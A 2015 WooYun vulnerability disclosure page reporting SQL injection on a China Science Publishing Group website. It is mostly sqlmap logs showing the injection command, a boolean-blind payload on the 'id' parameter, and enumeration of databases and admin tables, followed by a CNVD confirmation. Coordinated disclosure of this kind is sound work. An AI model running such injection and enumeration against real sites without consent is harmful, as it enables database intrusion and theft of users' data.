当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154526

漏洞标题:中国科学出版社传媒集团某处SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 小殊

提交时间:2015-11-24 23:58

修复时间:2016-01-11 17:06

公开时间:2016-01-11 17:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

做好安全 啦 、、、、

详细说明:

root@attack:~# sqlmap -u "http://**.**.**.**/s_second.php?id=28"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150918}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 18:58:47
[18:58:48] [INFO] testing connection to the target URL
[18:58:51] [INFO] heuristics detected web page charset 'GB2312'
[18:58:54] [WARNING] reflective value(s) found and filtering out
[18:58:55] [INFO] testing if the target URL is stable
[18:58:59] [INFO] target URL is stable
[18:58:59] [INFO] testing if GET parameter 'id' is dynamic
[18:58:59] [INFO] confirming that GET parameter 'id' is dynamic
[18:58:59] [WARNING] GET parameter 'id' does not appear dynamic
[18:58:59] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[18:58:59] [INFO] testing for SQL injection on GET parameter 'id'
[18:59:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:59:07] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:59:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:59:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:59:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:59:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:59:07] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:59:14] [INFO] heuristics detected web page charset 'ISO-8859-2'
[18:59:16] [INFO] testing 'MySQL inline queries'
[19:00:09] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicious' requests
[19:00:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[19:00:23] [INFO] testing 'PostgreSQL inline queries'
[19:00:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:00:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:00:41] [WARNING] time-based comparison requires larger statistical model, please wait............
[19:01:25] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[19:01:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:01:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:01:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:01:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:01:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:01:46] [INFO] testing 'Oracle AND time-based blind'
[19:01:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:01:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:01:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:02:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:03:06] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=28 AND 2130=2130
---
[19:04:10] [INFO] testing MySQL
[19:04:13] [INFO] confirming MySQL
[19:04:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL >= 5.0.0
[19:04:20] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'
------------------------------------------------------------------
available databases [3]:
[*] information_schema
[*] sciencep_db
[*] test
[19:18:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'
-----------------------
三个库
----------------------
[21:32:47] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5
[21:32:47] [INFO] fetching tables for database: 'sciencep_db'
[21:32:47] [INFO] fetching number of tables for database 'sciencep_db'
[21:32:47] [INFO] resumed: 158
[21:32:47] [INFO] resumed: 1discountrate
[21:32:47] [INFO] resumed: 2order
[21:32:47] [INFO] resumed: 3orderdetail
[21:32:47] [INFO] resumed: admininfo
[21:32:47] [INFO] resumed: article_t
[21:32:47] [INFO] resumed: ci_sessions
[21:32:47] [INFO] resumed: classification
[21:32:47] [INFO] resumed: column_t
[21:32:47] [INFO] resumed: daorushujibiao
[21:32:47] [INFO] resumed: department
[21:32:47] [INFO] resumed: group_list
[21:32:47] [INFO] resumed: hxhd_addon15
[21:32:47] [INFO] resumed: hxhd_addonarticle
[21:32:47] [INFO] resumed: hxhd_addonflash
[21:32:47] [INFO] resumed: hxhd_addonimages
[21:32:47] [INFO] resumed: hxhd_addonsoft
[21:32:47] [INFO] resumed: hxhd_addonspec
[21:32:47] [INFO] resumed: hxhd_admin
[21:32:47] [INFO] resumed: hxhd_admintype
[21:32:47] [INFO] resuming partial value: hxhd_a
[21:32:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:32:47] [INFO] retrieved:
[21:33:30] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
rc
[21:35:00] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
att
[21:37:11] [INFO] retrieved: hxhd_
-------------------------------------------------
当前数据库的表158个了,泄露的东西应该挺多的 我就不一个一个去跑了
----------------------------------------------
看下站可以网上购买 ,泄露应该有用户账号密码手机号码地址这些吧

-----------------------------------------------------
希望出版社送本书 (C语言程序设计教程(第二版))

漏洞证明:

root@attack:~# sqlmap -u "http://**.**.**.**/s_second.php?id=28"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150918}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 18:58:47
[18:58:48] [INFO] testing connection to the target URL
[18:58:51] [INFO] heuristics detected web page charset 'GB2312'
[18:58:54] [WARNING] reflective value(s) found and filtering out
[18:58:55] [INFO] testing if the target URL is stable
[18:58:59] [INFO] target URL is stable
[18:58:59] [INFO] testing if GET parameter 'id' is dynamic
[18:58:59] [INFO] confirming that GET parameter 'id' is dynamic
[18:58:59] [WARNING] GET parameter 'id' does not appear dynamic
[18:58:59] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[18:58:59] [INFO] testing for SQL injection on GET parameter 'id'
[18:59:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:59:07] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:59:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:59:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:59:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:59:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:59:07] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:59:14] [INFO] heuristics detected web page charset 'ISO-8859-2'
[18:59:16] [INFO] testing 'MySQL inline queries'
[19:00:09] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicious' requests
[19:00:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[19:00:23] [INFO] testing 'PostgreSQL inline queries'
[19:00:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:00:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:00:41] [WARNING] time-based comparison requires larger statistical model, please wait............
[19:01:25] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[19:01:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:01:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:01:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:01:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:01:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:01:46] [INFO] testing 'Oracle AND time-based blind'
[19:01:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:01:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:01:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:02:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:03:06] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=28 AND 2130=2130
---
[19:04:10] [INFO] testing MySQL
[19:04:13] [INFO] confirming MySQL
[19:04:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL >= 5.0.0
[19:04:20] [INFO] fetched data logged to text

修复方案:

过滤

版权声明:转载请注明来源 小殊@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-27 17:04

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,同时同步转由CNCERT向中科院上级主管部门通报,由其后续提供解决方案。

最新状态:

暂无